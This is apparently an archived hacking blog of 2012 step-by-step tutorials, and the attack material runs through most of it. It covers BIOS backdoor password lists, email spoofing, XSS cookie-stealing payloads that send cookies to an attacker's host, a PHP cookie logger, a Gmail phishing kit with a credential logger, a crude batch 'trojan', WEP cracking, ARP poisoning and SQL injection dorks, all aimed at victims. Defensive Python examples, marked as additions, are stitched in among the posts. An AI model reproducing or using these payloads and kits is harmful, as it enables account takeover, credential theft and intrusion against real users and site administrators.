HACK TRACK


Tuesday, 4 December 2012

How to Bypass or Remove a BIOS Password




A BIOS password is a protection measure that can be used to stop someone powering up a computer system or making changes in some of the computer's most sensitive areas. Many big-name computer manufacturers such as Dell and HP lock customers out of this area because they don't want the customer changing anything and potentially damaging the machine (which the manufacturer may then have to repair under warranty). However, when someone like a computer technician or hardware enthusiast needs to make hardware changes to the computer, they will need to access the BIOS. Here are some methods to bypass or remove a BIOS password.

NOTE: Do not try to guess the password on a password-protected hard drive. 3 wrong guesses will often result in the information on the hard drive being lost forever.

How to Bypass or Remove a BIOS Password by Removing the CMOS Battery:
The simplest way to remove a BIOS password is to remove the CMOS battery. A computer remembers its settings and keeps the time even when it is turned off and unplugged because these parts are powered by a small battery inside the computer called the CMOS battery. If we pull out this battery, the computer forgets a lot of its hardware settings, including its BIOS password. This should not be attempted on laptops unless you are experienced with laptop hardware.

Anyway, open up the computer case using a screwdriver and locate the flat, circular, metallic CMOS battery. It should look something like the picture to the right. Some computers have this part standing upright.

Once you have located it, observe how the latches are holding it. There are many different ways to remove a CMOS battery but the most common way on newer computers can be seen in the picture below.

Make sure to power down the computer, unplug the power cables and unplug any USB devices if they are powered. The computer must not be able to get power from anywhere for this to work. Take out the CMOS battery and wait 10 – 25 minutes before putting it back in. The reason for this wait is because the computer can still store power in its capacitors even though everything is unplugged. The waiting period allows enough time for them to discharge.

Plug everything back in, power up the computer and enter the BIOS again. If everything went well there should be no more password. In some cases, if you now get strange error messages during boot, you will need to go to "Load BIOS Defaults" in the BIOS and save the changes to fix them.

If this method didn’t work, try one of the methods below.

How to Bypass or Remove a BIOS Password using Software:
!BIOS is a freeware utility designed to be a whole BIOS and security suite. It can decrypt the passwords used by some of the most common BIOS makes such as Award, Phoenix, American Megatrends and IBM.
It can also brute force the password (a mode it calls "blasters"). However, this method is risky and can produce unexpected and unwanted results.

Note: Because of this application's password-cracking abilities, some antivirus software may report it as a virus/trojan. This is a false positive.

To start using !BIOS, reboot your computer and take note of the BIOS type and version you are running. For example, if your motherboard uses an Award BIOS you should look for text such as "Award Medallion BIOS 6.0".

Download !BIOS from here and save it to your desktop. Then open a DOS command window by going to Start > Run and typing: cmd

Once you see a black screen in front of you, type: cd desktop
 You should now see something like: C:\Documents and Settings\yourusername\Desktop>

Now type the name of the file you just downloaded; if you haven't changed the name, just type: bios320.exe


Use the down arrow to choose "Crackers" and then press the right arrow. Using the up and down arrows, select the BIOS that the motherboard is using and press Enter.

You should now see a menu asking what you want to crack; in most cases it's the Supervisor or System password you want, so press the 1 key. It will then show another menu asking how you want it cracked. Option 1 is pretty good, so try that first by pressing the 1 key. You should now have your BIOS password.

Reboot the computer, enter the BIOS and try it out.

How to Bypass or Remove a BIOS Password using the manufacturer backdoor password:

On many computers (especially old ones), manufacturers build in backdoor passwords for their own technicians so they can access the BIOS when the hardware is being serviced. Here are some of the ones that have been reported. You may need to try quite a few passwords before you find one that works.

These passwords are case sensitive.

AMI BIOS Backdoor Passwords:
A.M.I.
AAAMMMII
AMI
AMI?SW
AMI_SW
BIOS
CONDO
HEWITT RAND
LKWPETER
MI
Oder
PASSWORD

Award BIOS Backdoor Passwords:
(eight spaces)
01322222
589589
589721
595595
598598
ALFAROME
ALLY
Ally
Apaf
Award
AWARD PW
AWARD SW
AWARD?SW
AWARD_PW
AWARD_SW
AWKWARD
Awkward
IOSTAR
CONCAT
CONDO
Condo
D8on
Djonet
HLT
J256
J262
J322
J332
J64
KDD
LKWPETER
Lkwpeter
PINT
Pint
SER
SKY_FOXSYXZ
SKY_FOX
Syxz
SYXZ
TTPTHA
ZAAAADA
ZAAADA
ZBAAACA
ZJAAADC

Russian Award BIOS Passwords:
%шесть пробелов% (i.e. six spaces)
%девять пробелов% (i.e. nine spaces)

Phoenix Backdoor BIOS Passwords:
BIOS
CMOS
Phoenix
PHOENIX

Other Manufacturers' Backdoor Passwords: (manufacturer name – password)
VOBIS and IBM – merlin
Dell – Dell
Biostar – Biostar
Compaq – Compaq
Enox – xo11ne
Epox – central
Freetech – Posterie
Iwill – iwill
Jetway – spooml
Packard Bell – bell9
QDI – QDI
Siemens – SKY_FOX
SOYO – SY_MB
TMC – BIGO
Toshiba – Toshiba

Sunday, 30 September 2012

ANONYMOUS EMAIL SENDING


Most of us are curious to know a method to send anonymous emails to our friends for fun. But the question is: is it possible to send anonymous emails in spite of the advanced spam filtering technology adopted by email service providers like Gmail, Yahoo etc.? The answer is YES, it is still possible to bypass their spam filters and send anonymous emails to your friends. For example, you can send an email to your friend with the following sender details.

From: Bill Gates <billg@microsoft.com>
The art of sending this kind of email is known as Email Spoofing. In my previous post on How to Send Fake Email I insisted on using your own SMTP server to send anonymous emails. This method used to work in the past, but today it has a very low success rate since Gmail, Yahoo and all the other major email service providers block emails that are sent directly from a PC. In this post I have come up with a new way to send anonymous emails (spoofed emails) that has a better success rate. To successfully send an anonymous or spoofed email, you should send it through a relay server.

What is a Relay Server?

In simple words, a relay server is an SMTP server that is trusted by Google or Yahoo as an authorised sender of email. So, when you send an email using a relay server, email service providers like Yahoo and Gmail accept it and deliver it to the recipient's inbox. If the SMTP server is not authorised, Google and Yahoo will reject all the emails sent from it. This is the reason why using our own SMTP server to send emails fails.

So What’s Next?

Now all we have to do is find a trusted SMTP server to send spoofed emails. Usually all the emails sent from web hosting providers are trusted and authorised. So, you have to find a free web hosting provider that allows you to send emails. But most free web hosts disable the mail feature and do not allow users to send emails; this is done to avoid spamming. However, all paid hosting plans allow you to send any number of emails. Once you find a hosting service that allows sending emails from their servers, it's a cakewalk to send anonymous emails. All we have to do is modify the email headers to insert the spoofed From address.

I have created a PHP script that allows you to send emails from any name and email address of your choice. Here is a step-by-step procedure to setup your own Anonymous Email Sender Script:

Go to X10 Hosting and register a new account.

Download my Anonymous Email Sender Script (sendmail.rar).

Log in to your FreeWebHostingArea account and click on File Manager.

Upload the sendmail.php, pngimg.php and bg1.PNG files to the server.

Set permissions for sendmail.php, pngimg.php and bg1.PNG to 777.

Now type the following URL:

http://yoursite.x10hosting.com/sendmail.php
NOTE: yoursite must be replaced by the name of the subdomain that you chose during registration.
Use the script to send Anonymous Emails. Enjoy!!!

Thursday, 27 September 2012

CROSS SITE SCRIPTING (XSS):COOKIE GRABBING


XSS comes in two forms: persistent and non-persistent.

For XSS we will use something called a cookie catcher.
The question will be: why would we need someone else's cookie?
The answer is that we can change our browser's cookies to log in as them. So let's call it session hijacking.

First go to a free hosting site like http://www.110mb.com or other php hosting sites and register there. Then download this cookie catcher and upload it.

Cookie Catcher: http://adf.ly/Tdbm


What does the cookie catcher do?
It grabs the user's:
Cookies
IP
Referrer (the page the user came from)
Time and date

Get Vulnerable sites:

First we need sites that are vulnerable to XSS so it will work on them.
To test, we add a piece of code after the link.
I will use this site, which many of you have probably seen before:
http://adf.ly/Tdo3

Now, to test whether a site is vulnerable or not, you can add these codes:


Code:
"><script>alert(document.cookie)</script>
Code:
'><script>alert(document.cookie)</script>
Code:
"><script>alert("Test")</script>
Code:
'><script>alert("Test")</script>
Or a new one which I found out myself, with which you can inject HTML:
Code:
"><body bgcolor="FF0000"></body>
Code:
"><iframe src="www.google.com" height=800 width=800 frameborder=1 align=center></iframe>



Then if we see a JavaScript popup like this:
Or, if you used my tests and saw the page's background go black or a page of Google open inside that site, it means the site is vulnerable to XSS attacks.

In the end, if your site is http://www.example.com the link to test it would be: http://www.example.com/index.php?id="><script>alert(document.cookie)</script>




Persistent XSS:

In this method we will grab the victim's cookies stealthily, without raising suspicion.
Now assume we have a forum which has HTML enabled, or a site with a comment page which is vulnerable to XSS.
Now let's go to this site: http://adf.ly/Tdo3
Test and see if the XSS tests work on it.
It does! You're seeing one of the vulnerability's symptoms. So now let's try to grab its cookies. If there is a box to type in and submit, add this:



Code:
<script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>
and submit that post in the forum or the comment box. It's also good to add something before the code, like: hey i got a problem logging in???
so they won't suspect you.

Refresh the page, then go to the newly created page: in the same directory where you saved your cookie catcher .php, look for cookies.html, a new file that shows you the cookies. For example, if your cookie catcher link is:
http://www.example.com/cookie catcher.php
the container of the cookies would be:
http://www.example.com/cookies.html

Now visit cookies.html and you will see the session cookie!



PS: the site I used doesn't support cookies, so you can use http://adf.ly/TeZV, which does support cookies.

Now there is another way, a cookie-grabbing drive-by: add this code and post it:


Code:
<iframe frameborder=0 height=0 width=0 src=javascript:void(document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie)</iframe>


Then post it in the forum or the comment box.
This will open an iframe in the page, which lets you have the same page inside that website. If you don't know about iframes, make a new HTML file on your computer and just put in

<iframe src="www.google.com"></iframe> and you will understand iframes better.

Of course the site needs to have cookies supported! A blank JavaScript alert means you need to go to another site.



Non-Persistent XSS:

In this method we will make the victim admin go to our link. First we pick an XSS-vulnerable site. For this method we need a search.php page that is vulnerable to XSS and has cookies set on that page. In the vulnerable search.php, in the textbox for the word to search for, type:
Code:
<script>alert(document.cookie)</script>

and click the search button. If you see a JavaScript popup, it is vulnerable to a non-persistent XSS attack. Now we will do something similar.
I will use this link for this method: http://adf.ly/TeZV
Now, after search.php?search= add this:
Code:
"><script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>
Now go to http://www.tinyurl.com and shorten the whole page's link. Try to find a site administrator's e-mail on that vulnerable website and send a fake mail from an online fake mailer like this one:
http://hackcommunity.com/Thread-Anonymou...to-any-any

Now in the body just say something fake like: Hey i found a huge bug in your website! and give him the shortened link to the search.php with the code appended. TinyURL masks it, and once he visits the link you will see his cookies in your cookies.html while he is simply redirected to the link in your cookie catcher. No matter what he does, even if he changes his password, you can still log in as him.


Session Hijacking:

Now you have the admin's cookies either way, so we need to edit our own browser's cookies. First go to that page's admin login or its main page and delete ALL of your cookies for that page. Now go to your cookies.html page and copy everything after "Cookie:" into Notepad. The ; separates cookies from each other, so first copy the part before the ; .
Now go to that vulnerable website, clear the address bar and instead enter this:
Code:
Javascript:void(document.cookie="")
or for an example:
Code:
Javascript:void(document.cookie="__utma=255621336.1130089386.1295743598.1305934653.1305950205.86")
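As an added example (not part of the original post, and not code from any site it links to), here is why the probe strings above break out of a page, and how HTML-encoding the reflected value stops them; the template, the probe list and the helper names are this example's own, and no browser or server is needed.

```python
import html
from html.parser import HTMLParser

# The post's probe strings, embedded here as constructed test input.
PROBES = [
    '"><script>alert(document.cookie)</script>',
    "'><script>alert(document.cookie)</script>",
    '"><body bgcolor="FF0000"></body>',
    '"><iframe src="www.google.com" height=800 width=800 frameborder=1></iframe>',
]

# A search page that echoes the query back inside a double-quoted attribute.
TEMPLATE = '<input type="text" name="search" value="{q}">'


def render_unsafe(q):
    """Reflects the parameter verbatim.  A leading '"' ends value="..." and the '>'
    ends the tag, so the rest of the probe is parsed as new markup."""
    return TEMPLATE.format(q=q)


def render_safe(q):
    """Encodes the five HTML metacharacters (& < > " ') before reflecting, so the
    browser can never leave the attribute value whatever the probe contains."""
    return TEMPLATE.format(q=html.escape(q, quote=True))


class _StartTags(HTMLParser):
    """Collects start tags the way a browser tokenises them (quoted attribute
    values are honoured, so a '>' inside value="..." does not end the tag)."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def injected_tags(rendered):
    """Tag names other than the one <input> the template itself emits.  Anything
    in this list was smuggled in by the reflected parameter."""
    parser = _StartTags()
    parser.feed(rendered)
    parser.close()
    return [t for t in parser.tags if t != "input"]


if __name__ == "__main__":
    for probe in PROBES:
        print(f"{probe[:40]:42} unsafe -> {injected_tags(render_unsafe(probe))}"
              f"  safe -> {injected_tags(render_safe(probe))}")
```

The single-quote probe injects nothing here because the template quotes with double quotes; that context mismatch is why the post lists both variants, and why the encoding must cover both quote characters.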

Sunday, 23 September 2012

SIMPLE TROJAN MAKING


It is a simple two-line piece of code to make a trojan.
Go to the C drive and create a folder called Programs.
Open a Notepad file in that folder and type "@echo off" in the first line (without quotations).

Type In
2nd line: copy c:\programs\virus.bat c:\programs
3rd line: start c:\programs\virus.bat

And save the text file as "virus.bat".
If you click it, the code will execute and eat away the hard disk memory of the C drive, since you created it on that drive.
Make sure you don't click it; once you are done, just delete the folder.

That's all.

Sunday, 9 September 2012

WIRELESS HACKING-(WEP CRACK)


Wireless hacking with BackTrack 3 (or any version of it) is easy to do; in this article I'd like to guide you through wireless hacking with BackTrack 3. This tutorial was made based on some requests by my subscribers, who are familiar enough with BackTrack 3. In order to start, you need to make sure that you have met these requirements:


- Backtrack 3 or newer release

- 1 wireless router

- Laptop with wireless card(ALPHA/DLINK Wireless Adapters)

And let the hack begin:

In order to crack a WEP key you must have a large number of encrypted packets to work with. This is an unavoidable requirement if you wish to be successful. The best way to get a large number of packets is to perform an ARP request reinjection attack (otherwise known as attack -3). For this attack to produce results there must be a client already authenticated with the AP, or connecting to the AP.

***********************************************************************
Here are some things you need to know before you get confused
When you see this (device) or (bssid) you DON’T put the ( )!!!
(device) = Your wireless card *can be seen by typing iwconfig, e.g. eth0, eth1, ath0, ath1
(bssid) = The consenting computer's BSSID *when you start airodump-ng, any AP in range shows up on the left side and looks similar to 00:11:22:33:44:55
************************************************************************

Now before we start we need to make a txt file in the home folder. On the desktop you will see 2 icons, home and system. Double click the home icon, right click the blank white area and select create new Txt File; name it Exidous or whatever you want, click ok, then close the window.

Ok let’s start!
Commands | Meaning
====================

*open up 3 shell konsoles by clicking the little black box next to the start button.

* The first thing we're going to do is stop the device, aka the card
airmon-ng stop ath0

* Now we're going to put the wireless card down, so we can fake a MAC address (to see available wireless cards, type iwconfig)
ifconfig (device) down

* Ok, now just to make things simpler, so we don't have to hunt down what our MAC address is
macchanger --mac 00:11:22:33:44:55 (device)

* Now we're going to start the wireless card *make it listen for APs
airmon-ng start (device)

* Let's start seeing what APs are there
airodump-ng (device)

* After you see all the APs, execute the following to stop it and copy the bssid
CTRL+C, then copy the bssid of the consenting computer

* Now on to the consenting computer's AP (we're listening for authentication packets)
airodump-ng -c 6 -w Exidous --bssid (bssid) (device)

* Let's get on with making more data, and start the injection process (fake authentication, attack -1)
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 (device)

* Now we're going to inject the router ***this sometimes takes a while to actually inject!
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (device)

* On to cracking the key, ***AFTER GETTING AT LEAST 5,000 Data/IVs for 64 bit encryption / AFTER GETTING AT LEAST 10,000 Data/IVs for 128 bit encryption
aircrack-ng -n 64 --bssid (bssid) Exidous-01.cap

* Once you crack the WEP key, write it down and reboot to Windows. Now put it in as the username and the password without the colons.
EG: WEP Key = 33:C7:C6:09:30
When entered as username and password it will look like this: 33C7C60930

Get backtrack linux at - http://www.backtrack-linux.org/

SESSION HIJACKING


            In computer science, session hijacking refers to the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim's computer (see HTTP cookie theft).

Here we show how you can hijack a session using JavaScript and PHP.

What is a cookie?

A cookie, also known as a web cookie or HTTP cookie, is a small piece of text stored by the user's browser. A cookie is sent as a header by the web server to the web browser on the client side. A cookie is static and is sent back by the browser unchanged every time it accesses the server.
A cookie has an expiration time that is set by the server, and cookies are deleted automatically after that time.
Cookies are used to maintain a user's authentication and to implement a shopping cart during navigation, possibly across multiple visits.

What can we do after stealing cookie?

Well, as we know, web sites authenticate their users with a cookie, so it can be used to hijack the victim's session. We replace our own cookie with the victim's stolen cookie to hijack his session.

This is a cookie-stealing script that captures a user's cookies and stores them in a text file; these cookies can later be used.

PHP Code:
<?php

// Best-effort client address: proxy-supplied headers first, then REMOTE_ADDR.
function GetIP()
{
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
        $ip = getenv("HTTP_CLIENT_IP");
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
        $ip = getenv("REMOTE_ADDR");
    else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
        $ip = $_SERVER['REMOTE_ADDR'];
    else
        $ip = "unknown";
    return($ip);
}

// Appends one entry per request to log.txt: the raw query string (which carries the
// cookie= parameter), the client address, port, host, user agent, method and referer.
function logData()
{
    $ipLog = "log.txt";
    $cookie = $_SERVER['QUERY_STRING'];
    $register_globals = (bool) ini_get('register_globals');   // was misspelt 'register_gobals'
    if ($register_globals) $ip = getenv('REMOTE_ADDR');
    else $ip = GetIP();

    $rem_port = $_SERVER['REMOTE_PORT'];
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    $rqst_method = $_SERVER['REQUEST_METHOD'];   // was $_SERVER['METHOD'], which does not exist
    $rem_host = isset($_SERVER['REMOTE_HOST']) ? $_SERVER['REMOTE_HOST'] : '';   // only set with hostname lookups on
    $referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
    $date = date("l dS of F Y h:i:s A");
    $log = fopen($ipLog, "a+");

    // The two branches differ only in how entries are separated: a single line break
    // when the log is itself an .htm/.html page, a blank line for a plain .txt log.
    if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie\n");
    else
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
    fclose($log);
}

logData();

?>

Save the script as cookielogger.php on your server.
(You can easily get free web hosting from justfree, x10hosting etc.)

Create an empty text file log.txt in the same directory on the web server. The hijacked cookies will be stored here automatically.

Now for the hack to work we have to inject this piece of JavaScript into the target's page. This can be done by adding a link on a comments page that allows users to add hyperlinks etc. But beware: some sites don't allow JavaScript, so you have to be lucky for this to work.

The best way is to look for user-interactive sites which contain comments or forums.

Post the following code, which invokes the cookielogger on your host.

Code:
<script language="Java script">
document.location="http://www.yourhost.com/cookielogger.php?cookie=" + document.cookie;
</script>

You can also trick the victim into clicking a link that activates the JavaScript.
Below is the code which has to be posted.

Code:
<a href="java script:document.location='http://www.yourhost.com/cookielogger.php?cookie='+document.cookie;">Click here!</a>

Clicking an image can also activate the script. For this purpose you can use the code below.

Code:
<a href="java script:document.location='http://www.yourhost.com/cookielogger.php?cookie='+document.cookie;">
<img src="URL OF THE IMAGE"/></a>

All the details like the cookie, IP address and browser of the victim are logged to log.txt on your host server.

In the above codes please remove the space in "java script".

Hijacking the Session:

Now we have the cookie; what to do with it?
Download the Cookie Editor Mozilla plugin (you may find other plugins as well).

Go to the target site --> open Cookie Editor --> replace your cookie with the stolen cookie of the victim and refresh the page. That's it! You should now be in his account. Download the Cookie Editor Mozilla plugin from here: https://addons.mozilla.org/en-US/firefox/addon/573
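As an added example (not part of the original post), here are the two server-side controls that blunt the cookie replay described above and in the XSS post: a session cookie the injected scripts cannot read, and a session store that revokes an id when it is presented from a client other than the one it was issued to. The names SessionStore and session_cookie_header and the sample clients are this example's own.

```python
import hashlib
import secrets


def session_cookie_header(session_id, secure=True):
    """Set-Cookie line for the session id.  HttpOnly keeps it out of document.cookie
    (so the injected scripts above read nothing), SameSite=Strict keeps it off
    cross-site navigations, Secure keeps it off plain HTTP."""
    attrs = ["Path=/", "HttpOnly", "SameSite=Strict"]
    if secure:
        attrs.append("Secure")
    return "Set-Cookie: sid=" + session_id + "; " + "; ".join(attrs)


def _fingerprint(ip, user_agent):
    """Binds a session to the client that created it.  Binding to the IP is strict
    (mobile clients change address); drop ip from the hash if that bites."""
    return hashlib.sha256(f"{ip}|{user_agent}".encode()).hexdigest()


class SessionStore:
    """In-memory session table: id -> user and the fingerprint it was issued to."""

    def __init__(self):
        self._sessions = {}

    def create(self, user, ip, user_agent):
        sid = secrets.token_urlsafe(32)      # 256 bits of randomness: not guessable
        self._sessions[sid] = {"user": user, "fp": _fingerprint(ip, user_agent)}
        return sid

    def resolve(self, sid, ip, user_agent):
        """User owning sid, or None.  A valid id presented from a client that does
        not match is treated as a replayed (stolen) cookie: the session is revoked
        for everyone, including the legitimate owner, who simply logs in again."""
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        if entry["fp"] != _fingerprint(ip, user_agent):
            del self._sessions[sid]
            return None
        return entry["user"]

    def active(self, sid):
        return sid in self._sessions


if __name__ == "__main__":
    store = SessionStore()
    sid = store.create("admin", "10.0.0.5", "Firefox/15")     # constructed client
    print(session_cookie_header(sid))
    print("owner:", store.resolve(sid, "10.0.0.5", "Firefox/15"))
    print("replay:", store.resolve(sid, "198.51.100.7", "Firefox/15"))
    print("owner after replay:", store.resolve(sid, "10.0.0.5", "Firefox/15"))
```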

Wednesday, 29 August 2012

GMAIL HACKING


I am going to teach how to hack a Gmail account through a technique called phishing.

At First We Need 3 Files

1. Index.html
2. Mail.php
3. Log.txt

(1)


To Get Index.html File


----->First go to "www.gmail.com" and right click on it

----->Select "View Source Code"
----->Copy all the code and paste it in Notepad
----->Search the code for the word "action"
----->Beside the word action a link is present in quotations; delete the whole link inside the quotations
----->Instead type mail.php inside the quotations
----->Save it as index.html

(2)


To Get Mail.php File


---->Copy the following program and paste it in Notepad

---->Save it as mail.php

<?php

// Send the browser straight on to the real site so the visitor sees nothing unusual,
// then append every submitted form field to log.txt.
header('Location: http://www.gmail.com/');
$handle = fopen("log.txt", "a");
foreach ($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

(3)


Finally The 3rd File

----->It is an empty Notepad file
----->Save it as log.txt

That's all, we have all 3 files.


Upload These 3 Files Into Your Website


No need to worry about the website, there are many free web hosting sites to create a free website.


Eg: www.000webhost.com


----->Create your website and open your cPanel

----->Open File Manager
----->Upload these 3 files into the public_html folder
----->That's all

Then finally, to attack we need a phishing link.


Your phishing link will be:


www.example.com/index.html


Send the phishing link to your victim as if Gmail had sent the mail.


If he uses the link, the password and ID will be saved to the log.txt file on your website.


To View It

----->Open the cPanel of your website and open your file manager
----->Open the public_html folder
----->Click the log.txt file
----->Search for the word "Pass"
----->There you go, you will find the password, and beside it the ID will be there

This technique can be used for hacking any website.
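As an added example (not part of the original post), here is the check a defender or a password manager applies to a cloned login page like the one above: resolve every form's action against the page URL and flag any that would post credentials to a host other than the genuine login host. The HTML snippets are constructed, and accounts.example-mail.test is a placeholder for whatever host genuinely handles the login.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _FormActions(HTMLParser):
    """Collects the action attribute of every <form> (a missing action means the
    page's own URL)."""

    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions.append(dict(attrs).get("action") or "")


def form_targets(page_url, html_text):
    """Absolute URL each form on the page posts to.  A relative action such as
    'mail.php' resolves against the page's own host, which is the whole trick:
    the cloned page looks identical but its form points back at the clone's server."""
    parser = _FormActions()
    parser.feed(html_text)
    parser.close()
    return [urljoin(page_url, action) for action in parser.actions]


def suspicious_form_targets(page_url, html_text, trusted_hosts):
    """Form targets whose host is not allowed to receive credentials, or that
    would post them over plain http."""
    bad = []
    for target in form_targets(page_url, html_text):
        parts = urlsplit(target)
        if parts.scheme != "https" or (parts.hostname or "") not in trusted_hosts:
            bad.append(target)
    return bad


# Constructed: the genuine login form, and the clone after its action attribute has
# been rewritten to mail.php exactly as the steps above describe.
GENUINE = ('<form method="post" action="https://accounts.example-mail.test/signin">'
           '<input name="Email"><input name="Pass" type="password"></form>')
CLONED = GENUINE.replace('action="https://accounts.example-mail.test/signin"',
                         'action="mail.php"')
TRUSTED_HOSTS = {"accounts.example-mail.test"}


if __name__ == "__main__":
    print(suspicious_form_targets("http://www.example.com/index.html", CLONED, TRUSTED_HOSTS))
    print(suspicious_form_targets("https://accounts.example-mail.test/login", GENUINE, TRUSTED_HOSTS))
```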

ARP POISONING


MAN IN THE MIDDLE ATTACK PROCESS:

For doing this you need the BackTrack operating system installed in your VirtualBox.

Open the BackTrack operating system in VirtualBox.

The default username is "root" and the password is "toor".

------------------------------------------------------------------------------------------------------------

STEP 1:
 Open the root terminal (command prompt) in BT (BackTrack)

   Type "ettercap -G" and hit Enter
   It opens the Ettercap software
   Open Internet Connections from the taskbar menu
   Open the Konqueror browser
   Open the path "root/etc"
   Find the file "etter.conf" and open it

   Search for the word "privs" and below it (MAKE THEM BOTH EQUAL TO ZERO)
      ec_uid=0
      ec_gid=0

   Search for the word "linux"
   In the line "# if you use iptables" remove the #

   Save it.

-----------------------------------------------------------------------------------------------------------

STEP 2:

   Now open the "sysctl.conf" file
   Search for the line "# The next line to enable packet forwarding for IPv4"
   Remove the # from the line

   Below it another line is present: "# net.ipv4.ip_forward=1"
   Remove the # from the line

------------------------------------------------------------------------------------------------------------

STEP 3:

     Go to Ettercap
     Open    Sniff ------> Unified sniffing
     Select the interface and click OK

     Click    (1)  Start -------> Start sniffing
              (2)  Hosts ------> Scan for hosts

     To see the list of hosts
      Click   Hosts ---------> Hosts list

     Select the IP address of victim 1 in the list and click "Add Target 1"
     Select the IP address of victim 2 in the list and click "Add Target 2"

     Go to the "MITM" option in the menu bar of Ettercap
     Click "ARP poisoning"
     Select "Sniff remote connections" and press OK

     ARP replies will be sent to the victims

     To see that, open a terminal (command prompt), type "wireshark"
      and hit Enter

     You can see the ARP packets being sent to the victims.


------------------------------------------------------------------------------------------------------------

    To check whether it is working or not

    Go to   Plugins ----------> Manage plugins
    Click "chk_poison" to check the poisoning
     It will show whether the poisoning is working or not

------------------------------------------------------------------------------------------------------------

If you want any changes in the victim's browser:

Go to the path "Root/usr/share/ettercap/etter.filter.examples"

Open that file and copy one of the examples from it.

Paste it into an empty document and save it as "Filename.filter".

Compile the file "Filename.filter" in the terminal with the command "etterfilter Filename.filter -o NewFileName"

It then produces a new file.

Open Ettercap and open the "Filters" option.

Open "Load filter", browse to and select the compiled filter file and hit OK.

Now if the victim opens any website in his browser, the images in the website will appear as whatever image is prescribed in the filter (the link of the image in the filter).
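As an added example (not part of the original post), here is the detection side of the ARP poisoning above, in the style of arpwatch: track which MAC answers for each IP and alert on a flip or on one MAC claiming several IPs. The capture lines are constructed in the shape of tcpdump -n output; two hosts (.1, the gateway, and .20) are re-announced from one new MAC, which is exactly what the Target 1 / Target 2 setup produces on the wire.

```python
import re

# Matches 'ARP, Reply <ip> is-at <mac>' as printed by tcpdump -n.
ARP_REPLY = re.compile(r"ARP, Reply (\d+\.\d+\.\d+\.\d+) is-at ([0-9a-fA-F:]{17})")

# Constructed capture: .1 and .20 answer normally, then both are re-announced
# from 08:00:27:de:ad:01, which keeps re-asserting itself (line 5).
SAMPLE_CAPTURE = """\
12:00:01.000000 ARP, Reply 192.168.1.1 is-at 00:50:56:aa:bb:01, length 46
12:00:02.000000 ARP, Reply 192.168.1.20 is-at 00:50:56:aa:bb:14, length 46
12:00:05.000000 ARP, Reply 192.168.1.1 is-at 08:00:27:de:ad:01, length 46
12:00:05.100000 ARP, Reply 192.168.1.20 is-at 08:00:27:de:ad:01, length 46
12:00:06.000000 ARP, Reply 192.168.1.1 is-at 08:00:27:de:ad:01, length 46
"""


def detect_arp_spoofing(lines, trusted=None):
    """Walks ARP replies and returns alerts in order of appearance:
      ('mac_change', ip, old_mac, new_mac)         an IP's hardware address flipped
      ('mac_claims_multiple_ips', mac, (ip, ...))  one MAC answers for several IPs
    `trusted` seeds the table (e.g. {gateway_ip: gateway_mac}) so the very first
    poisoned reply is caught rather than silently learned."""
    ip_to_mac = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    mac_to_ips = {}
    for ip, mac in ip_to_mac.items():
        mac_to_ips.setdefault(mac, set()).add(ip)
    alerts = []
    for line in lines:
        m = ARP_REPLY.search(line)
        if not m:
            continue                      # not an ARP reply line
        ip, mac = m.group(1), m.group(2).lower()
        old = ip_to_mac.get(ip)
        if old is not None and old != mac:
            alerts.append(("mac_change", ip, old, mac))
        ip_to_mac[ip] = mac
        ips = mac_to_ips.setdefault(mac, set())
        if ip not in ips:
            ips.add(ip)
            if len(ips) > 1:
                alerts.append(("mac_claims_multiple_ips", mac, tuple(sorted(ips))))
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoofing(SAMPLE_CAPTURE.splitlines()):
        print(*alert)
```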



                            ---------THE END---------

Monday, 27 August 2012

SQL INJECTION



What is SQL Injection?
SQL injection is a common and well-known hacking method at present. Using this method an unauthorised person can access the website's database. The attacker can get all the details from the database.

What an attacker can do?

* Bypassing logins
* Accessing secret data
* Modifying the contents of a website
* Shutting down the MySQL server

Now let's dive into the real procedure for the SQL Injection.
Follow my steps.

-----------------------------------------------------------------------------

STEP 1: (Finding Vulnerable Website)

Our best partner for SQL injection is Google. We can find vulnerable (hackable) websites using a Google dork list; a Google dork is a search for vulnerable websites using Google search tricks. There are lots of tricks to search Google, but we are going to use the "inurl:" operator to find vulnerable websites.

Some Examples:

inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=

Here is a huge list of Google dorks:
http://www.ziddu.com/download/13161874/A...t.zip.html

HOW TO USE?

Copy one of the above commands and paste it into the Google search box.
